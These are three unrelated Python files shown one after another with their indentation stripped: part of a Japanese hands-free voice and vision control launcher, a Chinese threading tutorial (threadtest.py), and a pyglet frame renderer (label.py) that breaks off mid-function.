qFunc.remove(qCtrl_control_self)
# 起動条件(controls.pyと合わせる)
run_priority = 'normal'
main_speech_run = None
main_speech_switch = 'on'
main_vision_run = None
main_vision_switch = 'off'
main_desktop_run = None
main_desktop_switch = 'off'
bgm_run = None
bgm_switch = 'off'
browser_run = None
browser_switch = 'off'
player_run = None
player_switch = 'off'
if (self.runMode == 'debug'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'hud'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'live'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
bgm_switch = 'on'
browser_switch = 'on'
player_switch = 'on'
elif (self.runMode == 'translator'):
pass
elif (self.runMode == 'speech'):
pass
elif (self.runMode == 'number'):
pass
elif (self.runMode == 'camera'):
main_vision_switch = 'on'
main_desktop_switch = 'on'
elif (self.runMode == 'assistant'):
run_priority = 'below' # 通常以下
main_vision_switch = 'on'
main_desktop_switch = 'on'
elif (self.runMode == 'reception'):
main_vision_switch = 'on'
python_exe = 'python'
if (qPLATFORM == 'darwin'):
python_exe = 'python3'
# 実行優先順位設定
qFunc.setNice(run_priority)
# 待機ループ
self.proc_step = '5'
onece = True
last_alive = time.time()
while (self.proc_step == '5'):
self.proc_beat = time.time()
# 終了確認
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
qLog.log('info', self.proc_id, '' + str(txt))
if (txt == '_end_'):
break
# 停止要求確認
if (self.breakFlag.is_set()):
self.breakFlag.clear()
self.proc_step = '9'
break
# 活動メッセージ
if ((time.time() - last_alive) > 30):
qLog.log('debug', self.proc_id, 'alive', display=True, )
last_alive = time.time()
# キュー取得
if (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
inp_name = cn_r_get[0]
inp_value = cn_r_get[1]
cn_r.task_done()
else:
inp_name = ''
inp_value = ''
if (cn_r.qsize() > 1) or (cn_s.qsize() > 20):
qLog.log('warning', self.proc_id, 'queue overflow warning!, ' + str(cn_r.qsize()) + ', ' + str(cn_s.qsize()))
# スレッド設定
speechs = []
if (main_speech_run is None) and (main_speech_switch == 'on'):
cn_s.put(['_guide_', 'main_speech start!'])
if (qRUNATTR == 'python'):
main_speech_run = subprocess.Popen([python_exe, qPython_main_speech,
self.runMode,
self.micDev, self.micType, self.micGuide, self.micLevel,
self.qApiInp, self.qApiTrn, self.qApiOut,
self.qLangInp, self.qLangTrn, self.qLangTxt, self.qLangOut, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_speech_run = subprocess.Popen([qPython_main_speech[:-3],
self.runMode,
self.micDev, self.micType, self.micGuide, self.micLevel,
self.qApiInp, self.qApiTrn, self.qApiOut,
self.qLangInp, self.qLangTrn, self.qLangTxt, self.qLangOut, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug'):
speechs.append({ 'text':u'ハンズフリーコントロールシステムをデバッグモードで、起動しました。', 'wait':0, })
elif (self.runMode == 'live'):
speechs.append({ 'text':u'ハンズフリー翻訳機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'hud'):
speechs.append({ 'text':u'ヘッドアップディスプレイ機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'camera'):
speechs.append({ 'text':u'ハンズフリーカメラ機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'assistant'):
speechs.append({ 'text':u'AIアシスタント機能を、起動しました。', 'wait':0, })
elif (self.runMode == 'reception'):
speechs.append({ 'text':u'AI受付機能を、起動しました。', 'wait':0, })
if (not main_speech_run is None) and (main_speech_switch != 'on'):
time.sleep(10.00)
#main_speech_run.wait()
main_speech_run.terminate()
main_speech_run = None
if (main_vision_run is None) and (main_vision_switch == 'on'):
cn_s.put(['_guide_', 'main_vision start!'])
if (qRUNATTR == 'python'):
main_vision_run = subprocess.Popen([python_exe, qPython_main_vision,
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_vision_run = subprocess.Popen([qPython_main_vision[:-3],
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'カメラ機能を、起動しました。', 'wait':0, })
if (not main_vision_run is None) and (main_vision_switch != 'on'):
time.sleep(10.00)
#main_vision_run.wait()
main_vision_run.terminate()
main_vision_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'カメラ機能を、終了しました。', 'wait':0, })
if (main_desktop_run is None) and (main_desktop_switch == 'on'):
cn_s.put(['_guide_', 'main_desktop start!'])
if (qRUNATTR == 'python'):
main_desktop_run = subprocess.Popen([python_exe, qPython_main_desktop,
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
main_desktop_run = subprocess.Popen([qPython_main_desktop[:-3],
self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'デスクトップ制御機能を、起動しました。', 'wait':0, })
if (not main_desktop_run is None) and (main_desktop_switch != 'on'):
time.sleep(10.00)
#main_desktop_run.wait()
main_desktop_run.terminate()
main_desktop_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'デスクトップ制御機能を、終了しました。', 'wait':0, })
if (bgm_run is None) and (bgm_switch == 'on'):
cn_s.put(['_guide_', 'bgm control start!'])
if (qRUNATTR == 'python'):
bgm_run = subprocess.Popen([python_exe, qPython_bgm, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
bgm_run = subprocess.Popen([qPython_bgm[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'BGM再生機能を、起動しました。', 'wait':0, })
if (not bgm_run is None) and (bgm_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_bgm, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#bgm_run.wait()
bgm_run.terminate()
bgm_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'BGM再生機能を、終了しました。', 'wait':0, })
if (browser_run is None) and (browser_switch == 'on'):
cn_s.put(['_guide_', 'browser control start!'])
if (qRUNATTR == 'python'):
browser_run = subprocess.Popen([python_exe, qPython_browser, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
browser_run = subprocess.Popen([qPython_browser[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'ブラウザー連携機能を、起動しました。', 'wait':0, })
if (not browser_run is None) and (browser_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_browser, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#browser_run.wait()
browser_run.terminate()
browser_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'ブラウザー連携機能を、終了しました。', 'wait':0, })
if (player_run is None) and (player_switch == 'on'):
cn_s.put(['_guide_', 'player control start!'])
if (qRUNATTR == 'python'):
player_run = subprocess.Popen([python_exe, qPython_player, self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
else:
player_run = subprocess.Popen([qPython_player[:-3], self.runMode, ], )
#stdout=subprocess.PIPE, stderr=subprocess.PIPE, )
time.sleep(2.00)
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'動画連携機能を、起動しました。', 'wait':0, })
if (not player_run is None) and (player_switch != 'on'):
qFunc.txtsWrite(qCtrl_control_player, txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
time.sleep(10.00)
#player_run.wait()
player_run.terminate()
player_run = None
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
speechs.append({ 'text':u'動画連携機能を、終了しました。', 'wait':0, })
if (len(speechs) != 0):
qRiKi.speech(id=main_id, speechs=speechs, lang='', )
if (onece == True):
onece = False
if (self.runMode == 'debug') \
or (self.runMode == 'live'):
time.sleep(40)
speechs = []
speechs.append({ 'text':u'全ての準備が整いました。スタンバイしています。', 'wait':0, })
qRiKi.speech(id=main_id, speechs=speechs, lang='', )
# レディー設定
if (qFunc.statusCheck(self.fileRdy) == False):
qFunc.statusSet(self.fileRdy, True)
# ステータス応答
if (inp_name.lower() == '_status_'):
out_name = inp_name
out_value = '_ready_'
cn_s.put([out_name, out_value])
# リブート
#if (control == '_reboot_'):
# out_name = 'control'
# out_value = control
# cn_s.put([out_name, out_value])
# コントロール
control = ''
if (inp_name.lower() == 'control'):
control = inp_value
if (control == '_speech_begin_'):
main_speech_switch = 'on'
if (control == '_speech_end_'):
main_speech_switch = 'off'
if (control == '_vision_begin_'):
main_vision_switch = 'on'
if (control == '_vision_end_'):
main_vision_switch = 'off'
if (control == '_desktop_begin_'):
main_desktop_switch = 'on'
if (control == '_desktop_end_'):
main_desktop_switch = 'off'
if (control == '_bgm_begin_'):
bgm_switch = 'on'
if (control == '_bgm_end_') or (control == '_reboot_'):
bgm_switch = 'off'
if (control == '_browser_begin_'):
browser_switch = 'on'
if (control == '_browser_end_') or (control == '_reboot_'):
browser_switch = 'off'
if (control == '_player_begin_'):
player_switch = 'on'
if (control == '_player_end_') or (control == '_reboot_'):
player_switch = 'off'
# アイドリング
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
if (cn_r.qsize() == 0):
time.sleep(0.50)
else:
time.sleep(0.25)
# 終了処理
if (True):
# レディー解除
qFunc.statusSet(self.fileRdy, False)
# ビジー解除
qFunc.statusSet(self.fileBsy, False)
# プロセス終了
qFunc.txtsWrite(qCtrl_control_kernel ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_speech ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_vision ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_desktop ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_bgm ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_browser ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
qFunc.txtsWrite(qCtrl_control_player ,txts=['_end_'], encoding='utf-8', exclusive=True, mode='w', )
# スレッド停止
if (not main_speech_run is None):
main_speech_run.wait()
main_speech_run.terminate()
main_speech_run = None
if (not main_vision_run is None):
main_vision_run.wait()
main_vision_run.terminate()
main_vision_run = None
if (not main_desktop_run is None):
main_desktop_run.wait()
main_desktop_run.terminate()
main_desktop_run = None
if (not bgm_run is None):
bgm_run.wait()
bgm_run.terminate()
bgm_run = None
if (not browser_run is None):
#browser_run.wait()
browser_run.terminate()
browser_run = None
if (not player_run is None):
#player_run.wait()
player_run.terminate()
player_run = None
# キュー削除
while (cn_r.qsize() > 0):
cn_r_get = cn_r.get()
cn_r.task_done()
while (cn_s.qsize() > 0):
cn_s_get = cn_s.get()
cn_s.task_done()
# ログ
qLog.log('info', self.proc_id, 'end', display=self.logDisp, )
qFunc.statusSet(self.fileRun, False)
self.proc_beat = None
# シグナル処理
import signal
def signal_handler(signal_number, stack_frame):
print(os.path.basename(__file__), 'accept signal =', signal_number)
#signal.signal(signal.SIGINT, signal_handler)
signal.signal(signal.SIGINT, signal.SIG_IGN)
signal.signal(signal.SIGTERM, signal.SIG_IGN)
if __name__ == '__main__':
main_name = 'kernel'
main_id = '{0:10s}'.format(main_name).replace(' ', '_')
# 共通クラス
qRiKi.init()
qFunc.init()
# ログ
nowTime = datetime.datetime.now()
filename = qPath_log + nowTime.strftime('%Y%m%d.%H%M%S') + '.' + os.path.basename(__file__) + '.log'
qLog.init(mode='logger', filename=filename, )
qLog.log('info', main_id, 'init')
qLog.log('info', main_id, 'exsample.py runMode, ..., ')
#runMode debug, hud, live, translator, speech, number, camera, assistant, reception,
# パラメータ
if (True):
#runMode = 'live'
micDev = '0'
micType = 'bluetooth'
micGuide = 'on'
micLevel = '777'
if (len(sys.argv) >= 2):
runMode = str(sys.argv[1]).lower()
if (runMode == 'debug'):
micType = 'bluetooth'
micGuide = 'on'
elif (runMode == 'hud'):
micType = 'bluetooth'
micGuide = 'off'
elif (runMode == 'live'):
micType = 'bluetooth'
micGuide = 'off'
elif (runMode == 'translator'):
micType = 'bluetooth'
micGuide = 'on'
elif (runMode == 'speech'):
micType = 'usb'
micGuide = 'on'
elif (runMode == 'number'):
micType = 'usb'
micGuide = 'on'
elif (runMode == 'camera'):
micType = 'usb'
micGuide = 'off'
elif (runMode == 'assistant'):
micType = 'usb'
micGuide = 'off'
elif (runMode == 'reception'):
micType = 'usb'
micGuide = 'off'
if (len(sys.argv) >= 3):
micDev = str(sys.argv[2]).lower()
if (not micDev.isdigit()):
micGuide = 'off'
if (len(sys.argv) >= 4):
micType = str(sys.argv[3]).lower()
if (len(sys.argv) >= 5):
micGuide = str(sys.argv[4]).lower()
if (len(sys.argv) >= 6):
p = str(sys.argv[5]).lower()
if (p.isdigit() and p != '0'):
micLevel = p
if (len(sys.argv) >= 7):
qApiInp = str(sys.argv[6]).lower()
if (qApiInp == 'google') or (qApiInp == 'watson') \
or (qApiInp == 'azure') or (qApiInp == 'aws') \
or (qApiInp == 'nict'):
qApiTrn = qApiInp
qApiOut = qApiInp
else:
qApiTrn = 'free'
qApiOut = 'free'
if (qApiInp == 'nict'):
#qLangTrn = 'en,fr,es,id,my,th,vi,zh,ko,'
qLangTrn = 'en,fr,es,id,zh,ko,'
qLangOut = qLangTrn[:2]
if (len(sys.argv) >= 8):
qApiTrn = str(sys.argv[7]).lower()
if (len(sys.argv) >= 9):
qApiOut = str(sys.argv[8]).lower()
if (len(sys.argv) >= 10):
qLangInp = str(sys.argv[9]).lower()
qLangTxt = qLangInp
if (len(sys.argv) >= 11):
qLangTrn = str(sys.argv[10]).lower()
qLangOut = qLangTrn[:2]
if (len(sys.argv) >= 12):
qLangTxt = str(sys.argv[11]).lower()
if (len(sys.argv) >= 13):
qLangOut = str(sys.argv[12]).lower()
qLog.log('info', main_id, 'runMode =' + str(runMode ))
qLog.log('info', main_id, 'micDev =' + str(micDev ))
qLog.log('info', main_id, 'micType =' + str(micType ))
qLog.log('info', main_id, 'micGuide =' + str(micGuide ))
qLog.log('info', main_id, 'micLevel =' + str(micLevel ))
qLog.log('info', main_id, 'qApiInp =' + str(qApiInp ))
qLog.log('info', main_id, 'qApiTrn =' + str(qApiTrn ))
qLog.log('info', main_id, 'qApiOut =' + str(qApiOut ))
qLog.log('info', main_id, 'qLangInp =' + str(qLangInp ))
qLog.log('info', main_id, 'qLangTrn =' + str(qLangTrn ))
qLog.log('info', main_id, 'qLangTxt =' + str(qLangTxt ))
qLog.log('info', main_id, 'qLangOut =' + str(qLangOut ))
# 初期設定
if (qPLATFORM == 'darwin'):
try:
print('macOSでTKinterの利用設定 開始')
subprocess.call(['/usr/bin/osascript', '-e',
'tell app "Finder" to set frontmost of process "python" to true'])
print('macOSでTKinterの利用設定 完了')
except Exception as e:
print('macOSでTKinterの利用設定 失敗')
if (True):
qFunc.remove(qCtrl_control_kernel )
qFunc.remove(qCtrl_control_speech )
qFunc.remove(qCtrl_control_vision )
qFunc.remove(qCtrl_control_desktop )
qFunc.remove(qCtrl_control_bgm )
qFunc.remove(qCtrl_control_browser )
qFunc.remove(qCtrl_control_player )
qRiKi.statusReset_speech(False)
qRiKi.statusReset_vision(False)
qRiKi.statusReset_desktop(False)
# GUI
gui_disp = False
gui_time = time.time()
mouse_xy_zero = False
mouse_xy_time = time.time()
# 起動
guide_disp = False
guide_time = time.time()
main_core = None
if (True):
qLog.log('info', main_id, 'start')
# ガイド表示(開始)
img = qRiKi.getIconImage(filename='_kernel_start_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_start_', image=img, alpha_channel=0.5, )
qGuide.open()
guide_disp = True
guide_time = time.time()
# コアスレッド起動
main_core = main_kernel(main_id, '0',
runMode=runMode,
micDev=micDev, micType=micType, micGuide=micGuide, micLevel=micLevel,
qApiInp=qApiInp, qApiTrn=qApiTrn, qApiOut=qApiOut,
qLangInp=qLangInp, qLangTrn=qLangTrn, qLangTxt=qLangTxt, qLangOut=qLangOut, )
main_core.begin()
# 待機ループ
while (not main_core is None):
# 終了確認
control = ''
txts, txt = qFunc.txtsRead(qCtrl_control_self)
if (txts != False):
qLog.log('info', main_id, '' + str(txt))
if (txt == '_end_'):
break
else:
qFunc.remove(qCtrl_control_self)
control = txt
# 起動制御
if (control.lower()[:8] == '_speech_') \
or (control.lower()[:8] == '_vision_') \
or (control.lower()[:9] == '_desktop_') \
or (control.lower()[:5] == '_bgm_') \
or (control.lower()[:9] == '_browser_') \
or (control.lower()[:8] == '_player_'):
main_core.put(['control', control])
control = ''
# リブート
if (control == '_reboot_'):
main_core.abort()
del main_core
qFunc.remove(qCtrl_control_kernel)
main_core = None
main_core = main_kernel(main_id, '0',
runMode=runMode,
micDev=micDev, micType=micType, micGuide=micGuide, micLevel=micLevel,
qApiInp=qApiInp, qApiTrn=qApiTrn, qApiOut=qApiOut,
qLangInp=qLangInp, qLangTrn=qLangTrn, qLangTxt=qLangTxt, qLangOut=qLangOut, )
main_core.begin()
# GUI表示
if (control == '_gui_'):
GUI.init(alpha_channel=0.7, )
GUI.open()
gui_disp = True
gui_time = time.time()
if (gui_disp == True):
GUI.statusSet('_STS_SPEECH_', qFunc.statusCheck(qBusy_s_inp, ), )
GUI.statusSet('_STS_RECORD_', qFunc.statusCheck(qBusy_d_rec, ), )
GUI.statusSet('_STS_TELEWORK_', qFunc.statusCheck(qBusy_d_telework, ), )
else:
x, y = pyautogui.position()
if (x<100) and (y<100):
if (mouse_xy_zero == True):
if ((time.time() - mouse_xy_time) > 3):
GUI.init(alpha_channel=0.7, )
GUI.open()
gui_disp = True
gui_time = time.time()
try:
#pyautogui.FAILSAFE = False
pyautogui.moveTo(0,101)
#pyautogui.FAILSAFE = True
except:
pass
else:
mouse_xy_zero = True
mouse_xy_time = time.time()
else:
mouse_xy_zero = False
# スレッド応答
while (main_core.proc_r.qsize() != 0) and (control == ''):
res_data = main_core.get()
res_name = res_data[0]
res_value = res_data[1]
if (res_name.lower() == 'control'):
control = res_value
break
# ガイド表示
if (res_name.lower() == '_guide_'):
if (guide_disp == True):
qGuide.setMessage(txt=res_value, )
guide_time = time.time()
else:
img = qRiKi.getIconImage(filename='_kernel_guide_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_guide_', image=img, alpha_channel=0.5, )
qGuide.setMessage(txt=res_value, )
#qGuide.open()
guide_disp = True
guide_time = time.time()
# GUI表示(自動消去)
if (gui_disp == True):
event, values = GUI.read()
if (event in (None, '-exit-', '-cancel-')):
#print(event, values)
GUI.close()
gui_disp = False
if (event == '-ok-'):
#print(event, values)
GUI.close()
gui_disp = False
if (event[:5].lower() == 'riki,'):
#print(event, values)
GUI.close()
gui_disp = False
nowTime = datetime.datetime.now()
stamp = nowTime.strftime('%Y%m%d.%H%M%S')
controld_file = qPath_s_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
controld_file = qPath_v_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
controld_file = qPath_d_ctrl + stamp + '.txt'
qFunc.txtsWrite(controld_file, txts=[event], encoding='utf-8', exclusive=True, mode='w', )
x, y = pyautogui.position()
if (x==0) and (y==0):
gui_time = time.time()
if ((time.time() - gui_time) > 15):
GUI.close()
gui_disp = False
# ガイド表示(自動消去)
if (guide_disp == True):
event, values = qGuide.read()
if (event in (None, '-exit-', '-cancel-')):
qGuide.close()
guide_disp = False
if (guide_disp == True):
if ((time.time() - guide_time) > 3):
qGuide.close()
guide_disp = False
# アイドリング
slow = False
if (qFunc.statusCheck(qBusy_dev_cpu) == True):
slow = True
if (slow == True):
time.sleep(1.00)
else:
time.sleep(0.25)
# 終了
if (True):
qLog.log('info', main_id, 'terminate')
# GUI終了
GUI.close()
GUI.terminate()
gui_disp = False
# ガイド表示(終了)
img = qRiKi.getIconImage(filename='_kernel_stop_', )
if (not img is None):
qGuide.init(panel='1', title='_kernel_stop_', image=img, alpha_channel=0.5, )
qGuide.open()
guide_disp = True
guide_time = time.time()
# コアスレッド終了
if (not main_core is None):
main_core.abort()
del main_core
# ガイド表示終了
qGuide.close()
qGuide.terminate()
guide_disp = False
time.sleep(5.00)
qLog.log('info', main_id, 'bye!')
sys.exit(0)
|
threadtest.py
|
#codeing=utf-8
# @Time : 2017-09-29
# @Author : J.sky
# @Mail : bosichong@qq.com
# @Site : www.17python.com
# @Title : Python多线程编程(1)多线程创建的几种方法
# @Url : http://www.17python.com/blog/32
# @Details : Python多线程编程(1)多线程创建的几种方法
# @Other : OS X 10.11.6
# Python 3.6.1
# VSCode 1.15.1
###################################
# Python多线程编程(1)多线程创建的几种方法
###################################
'''
## Python多线程
在编程的日常中,如果遇到大量相同并且重复的计算任务时,我们考虑使用多线程,多线程可以并发的执行程序中的函数,这样就可以更快的利用CPU计算结果,结省时间成本。
`Python`中创建线程的方法有很多,可以通过`thread threading.Thread`或是线程池提供的方法来创建线程,这节我们主要讨论如何创建线程。
## 单线程时的操作
我们定义一些操作,先用单线顺序操作。
'''
# import time
# def loop():
# print("循环loop1打印时间======",time.ctime())
# time.sleep(3)
# loop()
# loop()
# print("loop1打印结束时间======",time.ctime())
'''
循环loop1打印时间====== Mon Oct 2 07:59:17 2017
循环loop1打印时间====== Mon Oct 2 07:59:20 2017
loop1打印结束时间====== Mon Oct 2 07:59:23 2017
顺序执行程序后,共花掉6秒时间,如果我们可以并发执行这个打印,或许我们能节约一些时间。
## thread
`thread`提供了一些线程创建与操作的方法,但官方文档及各类参考书中均有提到,`_thread`是一个比较低级的线程操作模块不建使用,这里我们也只是带过。
'''
# import _thread
# from utils import tn # 导入工具类中计算程序执行时间的函数
# def loop():
# print("循环loop1打印时间======",time.ctime())
# time.sleep(3)
# @tn
# def main():
# _thread.start_new_thread(loop, ())
# _thread.start_new_thread(loop, ())
# time.sleep(3)
# print("如果上边没有sleep(),程序会没有运行完打印直接退出")
# if __name__ == '__main__':
# main()
'''
循环loop1打印时间====== Mon Oct 2 14:24:49 2017
循环loop1打印时间====== Mon Oct 2 14:24:49 2017
如果上边没有sleep(),程序会没有运行完打印直接退出
程序运行时间:3.01ms
这次程序的运行我节省了3秒钟的宝贵时间!但也发现了`thread`模块的一些缺点,比如主线程结束时不会等待其它线程,这将导致程序没有打印结果直接退出了,这是我们不想看到的。
所以,由于`thread`模块的功能缺陷,通常不推荐使用`thread`,我们将继续讨论更高级的线程模块`threading`和其它线程相关模块。
## threading模块 Thread类
创建一个`Thread`实例,其中`target`这个参数可以接受一个函数.
我们先来试试,代码如下:
'''
# import time
# import threading
# from utils import tn # 导入工具类中计算程序执行时间的函数
# def loop1(tname):
# print(tname+"循环loop1打印时间======" + time.ctime())
# time.sleep(2)
# @tn
# def main():
# print('程序开始执行,耐心等待几秒。')
# threads = []#定义一个线程队列
# for i in range(5):
# t = threading.Thread(target=loop1, args=("thread"+str(i),))
# threads.append(t)
# for i in range(5):
# threads[i].start()
# for i in range(5):
# threads[i].join()
# if __name__ == '__main__':
# main()
# 通过继承`Thread`类派生子类并创建线程的对象。
# import time
# import threading
# from utils import tn # 导入工具类中计算程序执行时间的函数
# class MyThread(threading.Thread):
# def __init__(self, func, name=''):
# threading.Thread.__init__(self) # 这里必须添加父类的构器方法
# self.func = func
# self.name = name
# #此方法必须实现
# def run(self):
# self.func(self.name)
# def loop1(tname):
# print(tname+"循环loop1打印时间======" + time.ctime())
# time.sleep(2)
# @tn
# def main():
# print('程序开始执行,耐心等待几秒。')
# threads = [] #定义一个线程队列
# for i in range(5):
# t = MyThread(loop1, "thread"+str(i))
# threads.append(t)
# for i in range(5):
# threads[i].start()
# for i in range(5):
# threads[i].join()
# if __name__ == '__main__':
# main()
'''
注意:`run()`此方法必须实现;`threading.Thread.__init__(self)` 必须添加父类的构器方法
二种方法相比较起来,通过继承`Thread`类来创建线程的实例更直观灵活一些,通过以上例子的对比来看,多线程并发执行程序要比单线程执行节约很多时间。
关于多线程实例的创建还有其它方法,比如`Thread`构建方法中target参数也可以传入一个实例,不过个人感觉没有继承`Thread`类创建的实例更直观些,这里也就不举例了,
另外还可以通过线程池创建一组线程用来执行任务。
## threadpool Python线程池
`Python3`下载安装模块
pip3 install threadpool
用线程池测试一下刚才的打印,代码如下:
'''
import time
import threadpool
from utils import tn # 导入工具类中计算程序执行时间的函数
def loop1(tname):
print(tname+"循环loop1打印时间======" + time.ctime())
time.sleep(2)
@tn
def main():
l = ['11111','22222','33333','44444','55555']
pool = threadpool.ThreadPool(5)# 创建一个线程池
requests = threadpool.makeRequests(loop1, l) #传入函数 及函数需要的参数
[pool.putRequest(req) for req in requests]# 不理角这段代码,猜测是循环创建线程 分配任务。
pool.wait()#设置池内所有线程等待。
if __name__ == '__main__':
main()
'''
`Python`线程的创建方法应该还有很多种,这里就不在介绍了,博主感觉继承`Thread`类创建实例的方法比较经典可行,代码直观,其次是创建`Thread`对象传参进去也是简单到家了。
有关`Python`线程的创建就先聊到这里,稍后再研究一下线程锁,这几天正值国庆节,祝大家玩的开心!
'''
|
label.py
|
import numpy as np
import os
from scipy.ndimage import zoom
import time
import pyglet
from pyglet.text import Label
from pyglet.window import key, Window
class Im(object):
def __init__(self, display=None):
self.window = None
self.isopen = False
self.display = display
self.last_keystroke = ''
self._rec_input = False
self._text_h = 512
self._text_w = 512
self._text_c = 3
self._waiting = False
def wait(self):
self._waiting = True
self.txtshow('Waiting for data; no input required at this time')
def cont(self):
self._waiting = False
self.txtshow('Renderer ready!')
def wait_for_input(self, timeout=None):
if self.window is None: return
init_t = time.time()
while not self._rec_input and (timeout is None or time.time() - init_t < timeout):
self.window.dispatch_events()
def check_input(self):
if self.window is None: return
self.window.dispatch_events()
def txtshow(self, text):
if self.window is None:
width, height = self._text_w, self._text_h
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.channels = self._text_c
self.isopen = True
@self.window.event
def on_key_press(symbol, modifiers):
self.last_keystroke = key.symbol_string(symbol).lower().strip('_')
print('\n\nReceived keyboard input', self.last_keystroke, '\n\n')
self._rec_input = True
label = Label(text, font_name='Times New Roman', font_size=12,
anchor_x='center', anchor_y='center',
x=self.window.width//2, y=self.window.height//2)
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
label.draw()
self.window.flip()
def imshow(self, arr):
if self.window is None:
height, width, channels = arr.shape
self.window = pyglet.window.Window(
width=width, height=height, display=self.display)
self.width = width
self.height = height
self.channels = channels
self.isopen = True
@self.window.event
def on_key_press(symbol, modifiers):
self.last_keystroke = key.symbol_string(symbol).lower().strip('_')
print('\n\nReceived keyboard input', self.last_keystroke, '\n\n')
self._rec_input = True
assert arr.shape == (self.height, self.width, self.channels), \
"You passed in an image with the wrong number shape"
flipped_arr = np.flip(arr, axis=0)
image = pyglet.image.ImageData(self.width, self.height,
'RGB', flipped_arr.tobytes())
self.window.clear()
self.window.switch_to()
self.window.dispatch_events()
image.blit(0, 0)
self.window.flip()
def close(self):
if self.isopen:
self.window.close()
self.isopen = False
def __del__(self):
self.close()
class VideoRenderer:
play_through_mode = 0
restart_on_get_mode = 1
def __init__(self, mode=0, fps=8, zoom=3, playback_speed=1, channels=3):
self.mode = mode
self.channels = channels
if self.channels == 1:
self.zoom_factor = zoom
else:
self.zoom_factor = [zoom]*(self.channels-1) + [1]
self.playback_speed = playback_speed
self.stop_render = False
self.current_frames = None
self.v = None
self.fps = fps
self.sleep_time = 1./self.fps
self.cur_t = 0
self._waiting = False
def wait(self):
if not self._waiting:
if self.v is not None: self.v.close()
self.v = Im()
self._waiting = True
self.v.wait()
def cont(self):
if self._waiting:
self._waiting = False
if self.v is not None:
self.v.cont()
time.sleep(0.5)
self.v.close()
def stop(self):
self.stop_render = True
def threaded_render(self, frames):
render_thread = Thread(target=self.render, args=(frames,))
render_thread.start()
def get_time(self):
return self.cur_t
def wait_for_user(self):
if self.v is not None: self.v.close()
v = Im()
v.txtshow('Render ready; please hit any key...')
v.wait_for_input()
v.close()
def interactive_render(self, frames, max_iters=10):
if self.v is not None: self.v.close()
v = Im()
t = 0
cur_iter = 0
self.stop_render = False
keystroke = 'u'
t_limit = 60
init_t = time.time()
while not self.stop_render and \
time.time() - init_t < t_limit:
if t >= len(frames): t = 0
if t == 0: cur_iter += 1
self.cur_t = t
start = time.time()
zoomed_frame = zoom(frames[t], self.zoom_factor, order=1)
v.imshow(zoomed_frame)
end = time.time()
render_time = end - start
t += min(len(frames)-t, self.playback_speed)
v.check_input()
if v._rec_input:
keystroke = v.last_keystroke
break
sleep_time = max(0, self.sleep_time-render_time)
time.sleep(sleep_time)
v.close()
return keystroke, self.cur_t
def render(self, frames, max_iters=20):
if self.v is not None: self.v.close()
v = Im()
t = 0
cur_iter = -1
self.stop_render = False
while not self.stop_render and cur_iter < max_iters:
if t >= len(frames): t = 0
if t == 0: cur_iter += 1
